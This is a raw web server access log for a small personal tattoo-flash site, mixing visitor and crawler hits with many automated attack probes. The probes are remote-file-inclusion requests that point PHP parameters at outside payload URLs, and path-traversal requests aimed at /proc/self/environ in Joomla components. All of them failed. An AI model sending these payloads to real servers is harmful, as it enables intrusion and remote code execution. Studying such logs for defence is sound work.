72.30.142.216 - - [07/May/2010:21:01:16 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [07/May/2010:21:01:16 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.182 - - [07/May/2010:21:01:20 -0500] "GET //showthread.php?tid=86/index.php?kobr=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:21:01:21 -0500] "GET /logs//showthread.php?tid=86/index.php?kobr=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:21:01:21 -0500] "GET /logs/access_log.1264032000//showthread.php?tid=86/index.php?kobr=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.236.47.182 - - [07/May/2010:21:01:21 -0500] "GET /logs/access_log.1262822400//showthread.php?tid=86/index.php?kobr=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
87.250.255.243 - - [07/May/2010:21:01:22 -0500] "GET /logs/access_log.1257033600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.247.164.216 - - [07/May/2010:21:02:31 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?hl=en&client=safari&rls=en&q=vintage+tattoo+flash&aq=f&aqi=g3&aql=&oq=&gs_rfai=""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
74.247.164.216 - - [07/May/2010:21:02:32 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
74.247.164.216 - - [07/May/2010:21:02:33 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
72.26.122.245 - - [07/May/2010:21:03:03 -0500] "GET /logs/access_log.1270857600%20%20/index.php?meio.php=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.112.206.198 - - [07/May/2010:21:03:28 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.ca/search?q=vintage+flash&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
174.112.206.198 - - [07/May/2010:21:03:28 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
174.112.206.198 - - [07/May/2010:21:03:32 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.26.122.245 - - [07/May/2010:21:03:42 -0500] "GET /logs/access_log.1264636800/index.php?meio.php=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.232.85.247 - - [07/May/2010:21:09:37 -0500] "GET /logs/access_log.1266019200//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
211.232.85.247 - - [07/May/2010:21:09:37 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
211.232.85.247 - - [07/May/2010:21:09:37 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
83.69.115.198 - - [07/May/2010:21:10:08 -0500] "GET /logs/access_log.1270857600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:10:08 -0500] "GET /logs/access_log.1270857600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:10:08 -0500] "GET /logs/access_log.1270857600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:10:08 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:10:08 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:10:08 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:10:08 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:10:08 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:10:08 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.250.255.243 - - [07/May/2010:21:11:47 -0500] "GET /logs/access_log.1167177600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
83.69.115.198 - - [07/May/2010:21:12:18 -0500] "GET /logs/access_log.1272067200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:12:19 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:12:19 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:12:23 -0500] "GET /logs/access_log.1272067200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:12:23 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:12:23 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
123.125.68.84 - - [07/May/2010:21:18:25 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
87.250.255.243 - - [07/May/2010:21:20:28 -0500] "GET /logs/access_log.1232668800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.14 - - [07/May/2010:21:23:09 -0500] "GET /logs/access_log.1218067200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
174.136.55.175 - - [07/May/2010:21:23:42 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
82.96.90.170 - - [07/May/2010:21:23:45 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.121.201.218 - - [07/May/2010:21:24:08 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.201.218 - - [07/May/2010:21:24:08 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
80.88.16.30 - - [07/May/2010:21:24:27 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.826"
96.9.146.197 - - [07/May/2010:21:24:39 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.218.116.132 - - [07/May/2010:21:26:36 -0500] "GET /logs/access_log.1217116800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
200.175.239.226 - - [07/May/2010:21:26:59 -0500] "GET /index.php?meio.php=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
200.175.239.226 - - [07/May/2010:21:26:59 -0500] "GET /logs/index.php?meio.php=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.175.239.226 - - [07/May/2010:21:26:59 -0500] "GET /logs/access_log.1270857600%20%20/index.php?meio.php=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.46.12.116 - - [07/May/2010:21:28:19 -0500] "GET /logs/access_log.1265673600 HTTP/1.0" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707; MS-RTC LM 8)"
59.42.10.71 - - [07/May/2010:21:28:56 -0500] "GET /logs//calender.php?p=calender.php?p=http://soloteam.zoomshare.com/files/mIRC/copyright.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
59.42.10.71 - - [07/May/2010:21:28:56 -0500] "GET /logs/access_log.1270598400%20%20//calender.php?p=calender.php?p=http://soloteam.zoomshare.com/files/mIRC/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
59.42.10.71 - - [07/May/2010:21:28:56 -0500] "GET //calender.php?p=calender.php?p=http://soloteam.zoomshare.com/files/mIRC/copyright.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
59.42.10.71 - - [07/May/2010:21:29:10 -0500] "GET /logs//calender.php?p=calender.php?p=http://soloteam.zoomshare.com/files/mIRC/copyright.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
59.42.10.71 - - [07/May/2010:21:29:10 -0500] "GET /logs/access_log.1270598400%20%20//calender.php?p=calender.php?p=http://soloteam.zoomshare.com/files/mIRC/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
59.42.10.71 - - [07/May/2010:21:29:10 -0500] "GET //calender.php?p=calender.php?p=http://soloteam.zoomshare.com/files/mIRC/copyright.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
83.69.115.198 - - [07/May/2010:21:30:13 -0500] "GET /logs/access_log.1270598400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:30:15 -0500] "GET /logs/access_log.1270598400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.46.13.52 - - [07/May/2010:21:32:51 -0500] "GET /logs/access_log.1235001600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.69.115.198 - - [07/May/2010:21:33:28 -0500] "GET /logs/access_log.1223683200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:33:28 -0500] "GET /logs/access_log.1223683200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:33:29 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:33:29 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:33:29 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:33:29 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:33:32 -0500] "GET /logs/access_log.1223683200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:33:32 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [07/May/2010:21:33:33 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.250.255.243 - - [07/May/2010:21:34:22 -0500] "GET /logs/access_log.1220745600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.215 - - [07/May/2010:21:39:02 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.0" 200 3254 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325)"
207.46.204.187 - - [07/May/2010:21:39:21 -0500] "GET /logs/access_log.1174521600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.178.135.199 - - [07/May/2010:21:40:25 -0500] "GET /logs/access_log.1212537600 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1212537600""Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]"
89.178.135.199 - - [07/May/2010:21:40:25 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]"
59.42.10.71 - - [07/May/2010:21:41:03 -0500] "GET /logs/access_log.1228089600%20%20//calender.php?p=calender.php?p=http://soloteam.zoomshare.com/files/mIRC/copyright.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.96.90.170 - - [07/May/2010:21:41:48 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
82.96.90.170 - - [07/May/2010:21:41:48 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
82.96.90.170 - - [07/May/2010:21:41:48 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
174.136.55.175 - - [07/May/2010:21:45:06 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
174.136.55.175 - - [07/May/2010:21:45:06 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
174.136.55.175 - - [07/May/2010:21:45:06 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
91.121.201.218 - - [07/May/2010:21:48:57 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.201.218 - - [07/May/2010:21:48:57 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.201.218 - - [07/May/2010:21:48:58 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.201.218 - - [07/May/2010:21:48:58 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.201.218 - - [07/May/2010:21:48:58 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.201.218 - - [07/May/2010:21:48:58 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
96.9.146.197 - - [07/May/2010:21:49:11 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
96.9.146.197 - - [07/May/2010:21:49:11 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
96.9.146.197 - - [07/May/2010:21:49:11 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
80.88.16.30 - - [07/May/2010:21:49:12 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.826"
80.88.16.30 - - [07/May/2010:21:49:12 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.826"
80.88.16.30 - - [07/May/2010:21:49:12 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.826"
207.46.204.235 - - [07/May/2010:21:49:51 -0500] "GET /logs/access_log.1245283200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [07/May/2010:21:50:04 -0500] "GET /logs/access_log.1232236800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.176.136.109 - - [07/May/2010:21:53:15 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.bing.com/images/search?q=vintage+tattoo+designs&FORM=IGRE&qpvt=vintage+tattoo+designs""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; MDDC; .NET CLR 3.0.30729)"
67.176.136.109 - - [07/May/2010:21:53:15 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; MDDC; .NET CLR 3.0.30729)"
67.176.136.109 - - [07/May/2010:21:53:15 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; MDDC; .NET CLR 3.0.30729)"
67.176.136.109 - - [07/May/2010:21:53:15 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; MDDC; .NET CLR 3.0.30729)"
67.176.136.109 - - [07/May/2010:21:53:16 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; MDDC; .NET CLR 3.0.30729)"
67.176.136.109 - - [07/May/2010:21:53:16 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; MDDC; .NET CLR 3.0.30729)"
123.125.68.79 - - [07/May/2010:21:59:17 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
174.121.74.122 - - [07/May/2010:22:04:19 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""GeoHasher/Nutch-1.0 (GeoHasher Web Search Engine; geohasher.gotdns.org; geo_hasher at yahoo * com)"
174.121.74.122 - - [07/May/2010:22:04:19 -0500] "GET /costume/thmb4.htm HTTP/1.0" 200 3851 "-""GeoHasher/Nutch-1.0 (GeoHasher Web Search Engine; geohasher.gotdns.org; geo_hasher at yahoo * com)"
87.250.255.243 - - [07/May/2010:22:04:44 -0500] "GET /logs/access_log.1256083200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
82.96.90.170 - - [07/May/2010:22:04:55 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.805"
91.121.201.218 - - [07/May/2010:22:05:47 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.803"
91.121.201.218 - - [07/May/2010:22:05:47 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.803"
174.136.55.175 - - [07/May/2010:22:05:47 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.823"
80.88.16.30 - - [07/May/2010:22:06:00 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.826"
96.9.146.197 - - [07/May/2010:22:06:19 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.831"
70.38.117.233 - - [07/May/2010:22:06:46 -0500] "GET /logs//atom.php5?page=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
70.38.117.233 - - [07/May/2010:22:06:46 -0500] "GET //atom.php5?page=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
70.38.117.233 - - [07/May/2010:22:06:46 -0500] "GET /logs/access_log.1266710400//atom.php5?page=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.195.112.180 - - [07/May/2010:22:07:07 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.38.117.233 - - [07/May/2010:22:08:08 -0500] "GET /logs/access_log.1265068800//atom.php5?page=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
70.38.117.233 - - [07/May/2010:22:08:08 -0500] "GET /logs/access_log.1266537600//atom.php5?page=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.143 - - [07/May/2010:22:08:50 -0500] "GET /logs/access_log.1267056000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [07/May/2010:22:09:49 -0500] "GET /logs/access_log.1167436800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [07/May/2010:22:11:43 -0500] "GET /logs/access_log.1218326400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
82.96.90.170 - - [07/May/2010:22:18:00 -0500] "GET /logs/access_log.1272067200/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 414 "-""libwww-perl/5.805"
82.96.90.170 - - [07/May/2010:22:18:00 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.805"
82.96.90.170 - - [07/May/2010:22:18:01 -0500] "GET /logs/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 392 "-""libwww-perl/5.805"
